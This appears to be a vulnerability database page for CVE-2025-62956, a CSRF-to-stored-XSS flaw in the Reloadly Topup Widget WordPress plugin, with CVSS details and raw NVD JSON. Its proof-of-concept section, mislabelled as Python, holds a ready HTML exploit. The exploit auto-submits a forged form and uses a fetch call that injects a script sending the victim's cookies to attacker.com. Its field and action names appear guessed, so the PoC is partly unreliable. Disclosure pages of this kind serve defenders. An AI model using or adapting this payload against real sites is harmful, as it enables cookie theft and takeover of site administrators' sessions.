Security Vulnerability Report
中文
CVE-2025-62956 CVSS 7.1 HIGH

CVE-2025-62956

Published: 2025-10-27 02:15:56
Last Modified: 2026-04-27 17:16:38

Description

Cross-Site Request Forgery (CSRF) vulnerability in iseremet Reloadly reloadly-topup-widget allows Stored XSS.This issue affects Reloadly: from n/a through <= 2.0.1.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Reloadly Topup Widget <= 2.0.1 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-62956 --> <!-- Stored XSS via Reloadly Topup Widget Plugin --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - CVE-2025-62956</title> </head> <body> <h1>CSRF PoC for Reloadly Topup Widget</h1> <p>Click the button below to trigger the CSRF attack:</p> <!-- Form to inject Stored XSS payload --> <form action="http://target-site/wp-admin/admin-post.php" method="POST" id="csrfForm"> <input type="hidden" name="action" value="reloadly_save_settings"> <input type="hidden" name="reloadly_field" value='"><script>alert(document.cookie)</script><x y="'> <input type="hidden" name="nonce" value=""> </form> <button type="submit" onclick="this.disabled=true;document.getElementById('csrfForm').submit();">Execute Attack</button> <script> // Auto-submit form (for demonstration) // document.getElementById('csrfForm').submit(); // Alternative: Fetch-based attack without page navigation fetch('http://target-site/wp-admin/admin-post.php', { method: 'POST', mode: 'no-cors', credentials: 'include', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'action=reloadly_save_settings&reloadly_field="><script>fetch("https://attacker.com/steal?c="+document.cookie)</script><x y="' }); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62956", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:55.917", "lastModified": "2026-04-27T17:16:37.873", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in iseremet Reloadly reloadly-topup-widget allows Stored XSS.This issue affects Reloadly: from n/a through <= 2.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/reloadly-topup-widget/vulnerability/wordpress-reloadly-plugin-2-0-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}